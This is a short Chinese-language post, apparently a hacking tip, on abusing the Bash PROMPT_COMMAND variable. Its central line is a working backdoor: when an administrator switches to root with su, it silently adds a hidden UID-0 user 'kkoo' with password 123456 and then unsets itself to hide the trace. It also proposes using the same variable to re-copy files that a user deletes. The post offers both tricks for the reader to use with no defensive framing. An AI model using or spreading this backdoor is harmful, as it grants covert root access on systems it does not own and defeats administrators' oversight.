要利用成功的话，还得看管理员的习惯，是否喜欢用su切换成root

看个BASH的环境变量

$PROMPT_COMMAND

这个变量保存了在主提示符$PS1显示之前需要执行的命令.

export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"

看图：

随后你用su变成root，看看是否多了个用户呢

也可以建立用户删除不了的文件
比如，用户想删除某个，你在prompt_command里面加入cp命令，每次他执行完del都会又cp一个过去

具体怎么应用看你自己了